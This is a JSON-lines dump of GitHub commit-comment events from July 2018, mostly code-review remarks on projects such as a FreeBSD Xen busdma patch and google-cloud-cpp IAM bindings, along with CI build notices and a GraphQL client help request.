{"id":"7983574895","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751178,"position":141,"line":141,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:03:39Z","updated_at":"2018-07-18T15:03:39Z","author_association":"OWNER","body":"Short answer: No\r\n\r\nLong answer:\r\nThe functions `_bus_dmamap_load_buffer/ma/phys()` are inline functions that subr_bus_dma.c ([example](https://github.com/freebsd/freebsd/blob/master/sys/kern/subr_bus_dma.c#L329)) calls from  `bus_dmamap_load()` or `bus_dmamap_load_bio()`. These inline functions expand to something like (declaration in [x86/include/bus_dma.h](https://github.com/freebsd/freebsd/blob/master/sys/x86/include/bus_dma.h)):\r\n```C\r\nstruct bus_dma_tag_common *tc;\r\n\r\ntc = (struct bus_dma_tag_common *)dmat;\r\nreturn (tc->impl->load_phys(dmat, map, buf, buflen, flags, segs,\r\n    segp));\r\n```\r\nSo if save the operations in newtag->common.impl, the generic ones will be called directly, without running the Xen functions. newtag->common.impl\r\n\r\nWe also can not just save the operations. There is a need to create a second tag. Because that second tag contains some variables that the generic busdma functions use. We can not include them in ours, otherwise we would be assuming something about a opaque type which we shouldn't.\r\n\r\nAlso, creating the second tag increases the refcount on the parent (newtag->parent's parent to be precise) which is a good thing otherwise the parent might get destroyed even when we are using one of its childs."}},"created_at":"2018-07-18T15:03:39Z"}
{"id":"7983579494","type":"CommitCommentEvent","actor":{"login":"coryan"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29751182,"position":46,"line":46,"path":"google/cloud/iam_bindings.cc","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-18T15:04:22Z","updated_at":"2018-07-18T15:04:22Z","author_association":"NONE","body":"Same comments as above."}},"created_at":"2018-07-18T15:04:22Z"}
{"id":"7983581218","type":"CommitCommentEvent","actor":{"login":"coryan"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29751185,"position":38,"line":38,"path":"google/cloud/iam_bindings.cc","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-18T15:04:38Z","updated_at":"2018-07-18T15:04:38Z","author_association":"NONE","body":"What if some of these members are already in the list?"}},"created_at":"2018-07-18T15:04:38Z"}
{"id":"7983581852","type":"CommitCommentEvent","actor":{"login":"mbhave"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":29751187,"position":null,"line":null,"path":null,"commit_id":"9bd723ddada4f8f730c1b41b7fdf4a0a29da15e8","created_at":"2018-07-18T15:04:44Z","updated_at":"2018-07-18T15:04:44Z","author_association":"CONTRIBUTOR","body":"Did we discuss that? I thought we just spoke about removing the MVC specific `WebApplicationContext` from it. I can change it to `No ApplicationContext found on ServerWebExchange`. Given that this was only happening because of a bug in Spring Framework and that the context shouldn't be null otherwise, I think that should suffice."}},"created_at":"2018-07-18T15:04:44Z"}
{"id":"7983583982","type":"CommitCommentEvent","actor":{"login":"KapiX"},"repo":{"name":"haiku/website"},"payload":{"comment":{"id":29751190,"position":4,"line":15,"path":"content/blog/kapix/2018-07-08_libreoffice_for_haiku_a_not-so-short_story.md","commit_id":"099ed4abef0530e270eb52613b43e3ead48ef0ba","created_at":"2018-07-18T15:05:03Z","updated_at":"2018-07-18T15:05:03Z","author_association":"MEMBER","body":"This is supposed to be a quote (see the mailing list post linked below)"}},"created_at":"2018-07-18T15:05:03Z"}
{"id":"7983585944","type":"CommitCommentEvent","actor":{"login":"OlegBaskov"},"repo":{"name":"OlegBaskov/language-learning"},"payload":{"comment":{"id":29751193,"position":null,"line":null,"path":null,"commit_id":"95afb1d16204a0e92981306793805174a1aa0818","created_at":"2018-07-18T15:05:21Z","updated_at":"2018-07-18T15:05:21Z","author_association":"OWNER","body":"Commit from 94... server after 2018-07-16 merge conflict consequences fixes.\r\nSome data used for grammar tester tests -- to be checked and cleaned away..."}},"created_at":"2018-07-18T15:05:21Z"}
{"id":"7983586414","type":"CommitCommentEvent","actor":{"login":"rcarauta"},"repo":{"name":"rcarauta/website"},"payload":{"comment":{"id":29751195,"position":3,"line":3,"path":"lipsum.txt","commit_id":"26398b99d67c1d0f331c63aca54ef34766eef93a","created_at":"2018-07-18T15:05:25Z","updated_at":"2018-07-18T15:05:25Z","author_association":"OWNER","body":"### Teste\r\n\r\nComentário teste"}},"created_at":"2018-07-18T15:05:25Z"}
{"id":"7983586982","type":"CommitCommentEvent","actor":{"login":"coryan"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29751198,"position":58,"line":58,"path":"google/cloud/iam_bindings.cc","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-18T15:05:30Z","updated_at":"2018-07-18T15:05:30Z","author_association":"NONE","body":"If this was the last member you would want to remove the role too, right?"}},"created_at":"2018-07-18T15:05:30Z"}
{"id":"7983588255","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751200,"position":451,"line":451,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:05:42Z","updated_at":"2018-07-18T15:05:42Z","author_association":"NONE","body":"You cannot declare a variable in the middle of code."}},"created_at":"2018-07-18T15:05:42Z"}
{"id":"7983588789","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29751203,"position":null,"line":null,"path":null,"commit_id":"8f6022bc55277ad8f546f810df4b2bb8f3054522","created_at":"2018-07-18T15:05:46Z","updated_at":"2018-07-18T15:05:46Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/107"}},"created_at":"2018-07-18T15:05:46Z"}
{"id":"7983591159","type":"CommitCommentEvent","actor":{"login":"rcarauta"},"repo":{"name":"rcarauta/website"},"payload":{"comment":{"id":29751206,"position":null,"line":null,"path":null,"commit_id":"26398b99d67c1d0f331c63aca54ef34766eef93a","created_at":"2018-07-18T15:06:09Z","updated_at":"2018-07-18T15:06:09Z","author_association":"OWNER","body":"### Teste\r\n\r\nComentário teste"}},"created_at":"2018-07-18T15:06:09Z"}
{"id":"7983593139","type":"CommitCommentEvent","actor":{"login":"coryan"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29751211,"position":69,"line":69,"path":"google/cloud/iam_bindings.cc","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-18T15:06:27Z","updated_at":"2018-07-18T15:06:27Z","author_association":"NONE","body":"Would it make sense to keep the existing members sorted?"}},"created_at":"2018-07-18T15:06:27Z"}
{"id":"7983593642","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29751214,"position":null,"line":null,"path":null,"commit_id":"2dc3a50dacb2aa699b0c68c9abf8fcc5436dc81b","created_at":"2018-07-18T15:06:31Z","updated_at":"2018-07-18T15:06:31Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/last-seen-time-bumped-when-suspended-user-attempts-login-via-social-logins/75567/14\n"}},"created_at":"2018-07-18T15:06:31Z"}
{"id":"7983595090","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Siaukovich/NET.S.2018.Siaukovich.09"},"payload":{"comment":{"id":29751220,"position":50,"line":22,"path":"Matrix/MatrixSort.cs","commit_id":"98bc752f26d65fec85fa741bcc34fc0c45c5e37b","created_at":"2018-07-18T15:06:46Z","updated_at":"2018-07-18T15:06:46Z","author_association":"NONE","body":"Поскольку логика возрастания и убывания достигаются компаратором наличие разных методов не имеет смысла. Сортировка должны быть одна, компараторов сколько угодно. Если в компараторе будет решено что первым будет идти тот элемент, значение которого больше, это и будет сортировка по убыванию"}},"created_at":"2018-07-18T15:06:46Z"}
{"id":"7983596244","type":"CommitCommentEvent","actor":{"login":"coryan"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29751222,"position":80,"line":80,"path":"google/cloud/iam_bindings.cc","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-18T15:06:57Z","updated_at":"2018-07-18T15:06:57Z","author_association":"NONE","body":"I think this vector should be passed by const reference.  We pass by value when we are going to make a copy anyway."}},"created_at":"2018-07-18T15:06:57Z"}
{"id":"7983596472","type":"CommitCommentEvent","actor":{"login":"ctzsnooze"},"repo":{"name":"ctzsnooze/betaflight"},"payload":{"comment":{"id":29751223,"position":8,"line":47,"path":"src/main/sensors/gyroanalyse.c","commit_id":"226e491e119e4fb9b4f7f4aa3295f54a88516008","created_at":"2018-07-18T15:06:59Z","updated_at":"2018-07-18T15:06:59Z","author_association":"OWNER","body":"Ah OK forgot the _0.5\r\nSo 3.5 * 31.25 == 109.4 would be better, since that bin would stretch to about 140.65.\r\nThanks"}},"created_at":"2018-07-18T15:06:59Z"}
{"id":"7983597064","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751224,"position":457,"line":457,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:07:04Z","updated_at":"2018-07-18T15:07:04Z","author_association":"NONE","body":"I'm not sure I understand all this dance with temp_segs and segs. Why do you need to allocate a whole new array? Can't you just do `temp_segs = segs; segs = NULL;`?\r\n\r\nIn any case I think all this temp_segs and segs dance needs way more explanation."}},"created_at":"2018-07-18T15:07:04Z"}
{"id":"7983599641","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29751228,"position":null,"line":null,"path":null,"commit_id":"81bbff4676827feeee3d9507ad0495fc4961f4ad","created_at":"2018-07-18T15:07:28Z","updated_at":"2018-07-18T15:07:28Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win32-master Continuous [Build 231](http://build.palaso.org/viewLog.html?buildId=124963&buildTypeId=Liblcm_LiblcmWin32masterContinuous) outcome was **FAILURE**\nSummary: Compilation error: src\\SIL.LCModel.Core\\SIL.LCModel.Core.csproj (new) Build time: 00:00:44"}},"created_at":"2018-07-18T15:07:28Z"}
{"id":"7983599999","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751229,"position":478,"line":478,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:07:32Z","updated_at":"2018-07-18T15:07:32Z","author_association":"NONE","body":"labels are not indented."}},"created_at":"2018-07-18T15:07:32Z"}
{"id":"7983601980","type":"CommitCommentEvent","actor":{"login":"spastorino"},"repo":{"name":"spastorino/rust"},"payload":{"comment":{"id":29751231,"position":98,"line":370,"path":"src/librustc_mir/borrow_check/move_errors.rs","commit_id":"fa80c651ac27151bced89490a109ff1a99b19ce2","created_at":"2018-07-18T15:07:50Z","updated_at":"2018-07-18T15:07:50Z","author_association":"OWNER","body":"Because it's not copy anymore and I need `&mut ` to push to errors_buffer"}},"created_at":"2018-07-18T15:07:50Z"}
{"id":"7983602691","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751233,"position":484,"line":484,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:07:55Z","updated_at":"2018-07-18T15:07:55Z","author_association":"NONE","body":"Indentation is completely off here. Are you using 2 tabs?"}},"created_at":"2018-07-18T15:07:55Z"}
{"id":"7983602726","type":"CommitCommentEvent","actor":{"login":"mohmed1500"},"repo":{"name":"OTAUpdateCenter/ota-updater-2.0"},"payload":{"comment":{"id":29751234,"position":48,"line":48,"path":"dist/update_file.sh","commit_id":"f584eb19e24ccb9f8f5fdd6513964b30a759992c","created_at":"2018-07-18T15:07:58Z","updated_at":"2018-07-18T15:07:58Z","author_association":"NONE","body":"go"}},"created_at":"2018-07-18T15:07:58Z"}
{"id":"7983603506","type":"CommitCommentEvent","actor":{"login":"spastorino"},"repo":{"name":"spastorino/rust"},"payload":{"comment":{"id":29751235,"position":15,"line":71,"path":"src/librustc_mir/borrow_check/error_reporting.rs","commit_id":"fa80c651ac27151bced89490a109ff1a99b19ce2","created_at":"2018-07-18T15:08:06Z","updated_at":"2018-07-18T15:08:06Z","author_association":"OWNER","body":":+1:"}},"created_at":"2018-07-18T15:08:06Z"}
{"id":"7983603816","type":"CommitCommentEvent","actor":{"login":"coryan"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29751238,"position":39,"line":39,"path":"google/cloud/iam_bindings.h","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-18T15:08:09Z","updated_at":"2018-07-18T15:08:09Z","author_association":"NONE","body":"Consider a begin/end functions that return `std::map<>::iterator` that would make this class usable in for-range loops."}},"created_at":"2018-07-18T15:08:09Z"}
{"id":"7983606156","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751242,"position":177,"line":177,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:08:29Z","updated_at":"2018-07-18T15:08:29Z","author_association":"OWNER","body":"bus_dma_tag_destroy would return an error when there are ongoing operations ([busdma_bounce.c:256](https://github.com/freebsd/freebsd/blob/master/sys/x86/x86/busdma_bounce.c#L256)).\r\n\r\nIt makes sure there are no operations. If there are, `bus_dma_tag_destroy(xentag->parent)` returns `EBUSY`, which the if block returns straight away."}},"created_at":"2018-07-18T15:08:29Z"}
{"id":"7983606662","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Siaukovich/NET.S.2018.Siaukovich.09"},"payload":{"comment":{"id":29751244,"position":110,"line":43,"path":"Matrix/MatrixSort.cs","commit_id":"98bc752f26d65fec85fa741bcc34fc0c45c5e37b","created_at":"2018-07-18T15:08:34Z","updated_at":"2018-07-18T15:08:34Z","author_association":"NONE","body":"Компаратор тоже может быть null"}},"created_at":"2018-07-18T15:08:34Z"}
{"id":"7983607695","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29751246,"position":null,"line":null,"path":null,"commit_id":"81bbff4676827feeee3d9507ad0495fc4961f4ad","created_at":"2018-07-18T15:08:43Z","updated_at":"2018-07-18T15:08:43Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-win64-master Continuous [Build 196](http://build.palaso.org/viewLog.html?buildId=124962&buildTypeId=Liblcm_LiblcmWin64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2608, ignored: 44 Build time: 00:02:02"}},"created_at":"2018-07-18T15:08:43Z"}
{"id":"7983608360","type":"CommitCommentEvent","actor":{"login":"coryan"},"repo":{"name":"paprat/google-cloud-cpp"},"payload":{"comment":{"id":29751249,"position":26,"line":26,"path":"google/cloud/iam_bindings.h","commit_id":"a999b0250a566eb10c8b702bdbdee96c51c4a410","created_at":"2018-07-18T15:08:50Z","updated_at":"2018-07-18T15:08:50Z","author_association":"NONE","body":"Some comments would be helpful: what is the role of this class?  What does it abstract? Where can I find documentation about that?"}},"created_at":"2018-07-18T15:08:50Z"}
{"id":"7983608626","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/liblcm"},"payload":{"comment":{"id":29751250,"position":null,"line":null,"path":null,"commit_id":"81bbff4676827feeee3d9507ad0495fc4961f4ad","created_at":"2018-07-18T15:08:52Z","updated_at":"2018-07-18T15:08:52Z","author_association":"NONE","body":"TeamCity LCM :: liblcm-linux64-master Continuous [Build 198](http://build.palaso.org/viewLog.html?buildId=124964&buildTypeId=Liblcm_LiblcmLinux64masterContinuous) outcome was **SUCCESS**\nSummary: Tests passed: 2620, ignored: 32 Build time: 00:02:10"}},"created_at":"2018-07-18T15:08:52Z"}
{"id":"7983611121","type":"CommitCommentEvent","actor":{"login":"nkarre"},"repo":{"name":"billybichon/liveGQL"},"payload":{"comment":{"id":29751257,"position":null,"line":null,"path":null,"commit_id":"42154b200727e70a7556e3ca89b217407d9b1a70","created_at":"2018-07-18T15:09:16Z","updated_at":"2018-07-18T15:09:16Z","author_association":"NONE","body":"Hi Billy Bichon\r\n\r\nHelp me resolving the issue , When we tried from JS client is work fine but does not work with Java.\r\nPlease find the  Schema and Subscription query tried in Json object format and String format but no luck. \r\n\r\nServer schema:\r\n# The subscription root type, specifying what we can subscribe to\r\ntype Subscription {\r\n  messageAdded(channelId: ID!): Message\r\n}\r\n\r\nJS CLient: (working )\r\nconst messagesSubscription = gql`\r\n  subscription messageAdded($channelId: ID!) {\r\n    messageAdded(channelId: $channelId) {\r\n      id\r\n      text\r\n    }\r\n  }\r\n`;\r\nconst subscriptionOperation = {\r\n    query: messagesSubscription,\r\n    variables: { channelId: 1 }\r\n}; \r\n\r\n\r\n\r\nJAVA Client: (not receiving data when changed)\r\nString query = \"subscription messageAdded($channelId: ID!) {\\n\" + \r\n        \"    messageAdded(channelId: $channelId) {\\n\" + \r\n        \"      id\\n\" + \r\n        \"      text\\n\" + \r\n        \"    }\\n\" + \r\n        \"  }\";\r\n    HashMap<String, Object> variablesMap= new HashMap<>();\r\n    variablesMap.put(\"channelId\", 7);\r\n    \r\n    JSONObject graphqlMsg = new JSONObject();\r\n    graphqlMsg.put(\"variables\", variablesMap);\r\n    graphqlMsg.put(\"query\", query);\r\n\r\nActual Query = {\"variables\":{\"channelId\":7},\"query\":\"subscription messageAdded($channelId: ID!) {\\n    messageAdded(channelId: $channelId) {\\n      id\\n      text\\n    }\\n  }\"}\r\n\r\nSubscription hs2 = liveGQL.subscribe( \"\\\"subscription {messageAdded($channelId:String!) {messageAdded(channelId: $channelId) {id,text}}\\\",\\\"variables\\\":{\\\"channelId\\\":7}}\",\"messageAdded\");\r\n      \r\n Subscription hs3 = liveGQL.subscribe(\"{\\\"query\\\":\\\"subscription messageAdded($channelId:ID!) {messageAdded(channelId:$channelId) {id,text}}\\\",\\\"variables\\\":{\\\"channelId\\\":\\\"7\\\"},\\\"operationName\\\":\\\"messageAdded\\\"}\",\"messageAdded\");\r\n        \r\n \r\n"}},"created_at":"2018-07-18T15:09:16Z"}
{"id":"7983612952","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751261,"position":610,"line":610,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:09:34Z","updated_at":"2018-07-18T15:09:34Z","author_association":"NONE","body":"Same here, you don't need the `else if` because the previous ìf` already returns."}},"created_at":"2018-07-18T15:09:34Z"}
{"id":"7983613605","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751264,"position":191,"line":191,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:09:40Z","updated_at":"2018-07-18T15:09:40Z","author_association":"OWNER","body":"Ok. I'll fix it"}},"created_at":"2018-07-18T15:09:40Z"}
{"id":"7983615935","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751268,"position":209,"line":209,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:10:02Z","updated_at":"2018-07-18T15:10:02Z","author_association":"OWNER","body":"I'm sorry, I don't get what you mean."}},"created_at":"2018-07-18T15:10:02Z"}
{"id":"7983616074","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29751269,"position":null,"line":null,"path":null,"commit_id":"a19a88b188e0925a19d1985b0bf327e4987d43e3","created_at":"2018-07-18T15:10:04Z","updated_at":"2018-07-18T15:10:04Z","author_association":"OWNER","body":"Collision 9~11"}},"created_at":"2018-07-18T15:10:04Z"}
{"id":"7983617827","type":"CommitCommentEvent","actor":{"login":"Bbowen100"},"repo":{"name":"azemcetiner/mommymonitor"},"payload":{"comment":{"id":29751273,"position":18,"line":19,"path":"MM_App/src/Reducers/QuestionnaireReducer.js","commit_id":"b67ee9797df1fc3bb80e6415c72489b2a0fffbba","created_at":"2018-07-18T15:10:20Z","updated_at":"2018-07-18T15:10:20Z","author_association":"COLLABORATOR","body":"Oh right! Good thinking"}},"created_at":"2018-07-18T15:10:20Z"}
{"id":"7983622262","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-pwa-workflow"},"payload":{"comment":{"id":29751291,"position":17,"line":17,"path":"src/screening/CompletedScreenings.jsx","commit_id":"ea08569781eb0a70295bb5e66e1cf959719ed0a3","created_at":"2018-07-18T15:11:03Z","updated_at":"2018-07-18T15:11:03Z","author_association":"MEMBER","body":"Cool, I like this @cioan... "}},"created_at":"2018-07-18T15:11:03Z"}
{"id":"7983624896","type":"CommitCommentEvent","actor":{"login":"ronvente"},"repo":{"name":"ronvente/Vaatwasser-uitruimen"},"payload":{"comment":{"id":29751297,"position":null,"line":null,"path":null,"commit_id":"95ed44b9db75e6a8295e65ec9197e56b100ef66d","created_at":"2018-07-18T15:11:28Z","updated_at":"2018-07-18T15:11:28Z","author_association":"OWNER","body":"Is het een vaatwasser of een afwasmachine?"}},"created_at":"2018-07-18T15:11:28Z"}
{"id":"7983628062","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751304,"position":731,"line":731,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:11:57Z","updated_at":"2018-07-18T15:11:57Z","author_association":"NONE","body":"I'm not sure why you can just use BUS_SPACE_MAXADDR directly below. This local maxaddr variable doesn't seem to be useful."}},"created_at":"2018-07-18T15:11:57Z"}
{"id":"7983628750","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-pwa-workflow"},"payload":{"comment":{"id":29751306,"position":17,"line":17,"path":"src/screening/CompletedScreenings.jsx","commit_id":"ea08569781eb0a70295bb5e66e1cf959719ed0a3","created_at":"2018-07-18T15:12:03Z","updated_at":"2018-07-18T15:12:03Z","author_association":"MEMBER","body":"At some point since we are now loading the individual active visit for a patient, we may want to use that instead in the Required Screenings component that I create... don't need to look at it now, will make a mental note to look at it later..."}},"created_at":"2018-07-18T15:12:03Z"}
{"id":"7983630476","type":"CommitCommentEvent","actor":{"login":"mohmed1500"},"repo":{"name":"lairdshaw/fups"},"payload":{"comment":{"id":29751310,"position":50,"line":2134,"path":"classes/CFUPSBase.php","commit_id":"0bd836225feb69079d25a7bd94bf6a8538d66dc6","created_at":"2018-07-18T15:12:19Z","updated_at":"2018-07-18T15:12:19Z","author_association":"NONE","body":"gfgy"}},"created_at":"2018-07-18T15:12:19Z"}
{"id":"7983631851","type":"CommitCommentEvent","actor":{"login":"vrobinson"},"repo":{"name":"spritely/ReadModel.Mongo"},"payload":{"comment":{"id":29751316,"position":null,"line":null,"path":null,"commit_id":"fd15a32cac524e08c0041e08faa33a1488545c9e","created_at":"2018-07-18T15:12:31Z","updated_at":"2018-07-18T15:12:31Z","author_association":"CONTRIBUTOR","body":"These changes are bigger than a simple bug fix, suggest you increment the second digit, that is to version 0.7.0."}},"created_at":"2018-07-18T15:12:31Z"}
{"id":"7983632157","type":"CommitCommentEvent","actor":{"login":"mohmed1500"},"repo":{"name":"lairdshaw/fups"},"payload":{"comment":{"id":29751317,"position":15,"line":1400,"path":"classes/CFUPSBase.php","commit_id":"0bd836225feb69079d25a7bd94bf6a8538d66dc6","created_at":"2018-07-18T15:12:34Z","updated_at":"2018-07-18T15:12:34Z","author_association":"NONE","body":"1400"}},"created_at":"2018-07-18T15:12:34Z"}
{"id":"7983634217","type":"CommitCommentEvent","actor":{"login":"VictorJuliani"},"repo":{"name":"VictorJuliani/chartjs-plugin-zoom"},"payload":{"comment":{"id":29751320,"position":null,"line":null,"path":null,"commit_id":"2666a2c203348b6f97b1b995619cbc77cca00911","created_at":"2018-07-18T15:12:53Z","updated_at":"2018-07-18T15:12:53Z","author_association":"OWNER","body":"I couldn't reproduce the issue, though (at least with my master version).\r\nWhen PAN is enabled, zoom-by-dragging is ignored on both LMB & touch interactions (tested on a bar chart). I can only zoom through double click and wheel while PAN is active."}},"created_at":"2018-07-18T15:12:53Z"}
{"id":"7983635395","type":"CommitCommentEvent","actor":{"login":"mohmed1500"},"repo":{"name":"lairdshaw/fups"},"payload":{"comment":{"id":29751322,"position":null,"line":null,"path":null,"commit_id":"0bd836225feb69079d25a7bd94bf6a8538d66dc6","created_at":"2018-07-18T15:13:05Z","updated_at":"2018-07-18T15:13:05Z","author_association":"NONE","body":"0bd8362"}},"created_at":"2018-07-18T15:13:05Z"}
{"id":"7983636059","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"ace411/bingo-functional"},"payload":{"comment":{"id":29751326,"position":25,"line":25,"path":"src/Algorithms/MapDeep.php","commit_id":"14030163625613a8b4c68280ec2fb9bd286bded7","created_at":"2018-07-18T15:13:11Z","updated_at":"2018-07-18T15:13:11Z","author_association":"CONTRIBUTOR","body":"Missing EOF...."}},"created_at":"2018-07-18T15:13:11Z"}
{"id":"7983638137","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751329,"position":258,"line":258,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:13:30Z","updated_at":"2018-07-18T15:13:30Z","author_association":"OWNER","body":"No. This is a safety check for a bug/memory leak in `xen_bus_dmamap_unload()`.\r\n\r\nIf unload was not called, `bus_dmamap_destroy()` would return `EBUSY` ([busdma_bounce.c:375](https://github.com/freebsd/freebsd/blob/master/sys/x86/x86/busdma_bounce.c#L375)).\r\n\r\nIf refs is still not NULL here, it means there is something wrong in the code of `xen_bus_dmamap_unload()`.\r\n\r\nMaybe I can improve the message."}},"created_at":"2018-07-18T15:13:30Z"}
{"id":"7983641635","type":"CommitCommentEvent","actor":{"login":"ynFatal"},"repo":{"name":"ynFatal/test3"},"payload":{"comment":{"id":29751335,"position":null,"line":null,"path":null,"commit_id":"dc0913cfe504340faeda97d60064ec83a97ba5fe","created_at":"2018-07-18T15:14:03Z","updated_at":"2018-07-18T15:14:03Z","author_association":"OWNER","body":"添加了个文件夹，里边放了html文件，文件内容为nice"}},"created_at":"2018-07-18T15:14:03Z"}
{"id":"7983643240","type":"CommitCommentEvent","actor":{"login":"SurajGupta"},"repo":{"name":"spritely/ReadModel.Mongo"},"payload":{"comment":{"id":29751338,"position":null,"line":null,"path":null,"commit_id":"fd15a32cac524e08c0041e08faa33a1488545c9e","created_at":"2018-07-18T15:14:17Z","updated_at":"2018-07-18T15:14:17Z","author_association":"CONTRIBUTOR","body":"will do!\n\nOn Wed, Jul 18, 2018 at 11:12 AM Victor <notifications@github.com> wrote:\n\n> These changes are bigger than a simple bug fix, suggest you increment the\n> second digit, that is to version 0.7.0.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/spritely/ReadModel.Mongo/commit/fd15a32cac524e08c0041e08faa33a1488545c9e#commitcomment-29751316>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABdWoM4csNIxlhlZiw7AZQX1bCkAiCxlks5uH1BfgaJpZM4VUyjX>\n> .\n>\n\n\n-- \nBest Regards,\nSuraj\nhttp://obeautifulcode.com/\n"}},"created_at":"2018-07-18T15:14:17Z"}
{"id":"7983644920","type":"CommitCommentEvent","actor":{"login":"rodrigordi"},"repo":{"name":"rodrigordi/opennfe"},"payload":{"comment":{"id":29751345,"position":22,"line":497,"path":"Open NFe 3/RDI.NFe2.Business/RDI.NFe2.Business.FuncaoAutomacao.cs","commit_id":"d7966ee61c4cb2292808bf31d8adfdb566c6f274","created_at":"2018-07-18T15:14:33Z","updated_at":"2018-07-18T15:14:33Z","author_association":"OWNER","body":"essa é a certa.\r\n"}},"created_at":"2018-07-18T15:14:33Z"}
{"id":"7983646838","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751349,"position":209,"line":209,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:14:51Z","updated_at":"2018-07-18T15:14:51Z","author_association":"NONE","body":"Use:\r\n\r\nreturn (parent->impl->tag_set_domain(parent));\r\n\r\nYou have a local variable that already contains xentag->parent, so better use it."}},"created_at":"2018-07-18T15:14:51Z"}
{"id":"7983650528","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29751360,"position":266,"line":266,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T15:15:25Z","updated_at":"2018-07-18T15:15:25Z","author_association":"OWNER","body":"I'll take a look. Doesn't look like we can do much though without over-complicating things"}},"created_at":"2018-07-18T15:15:25Z"}
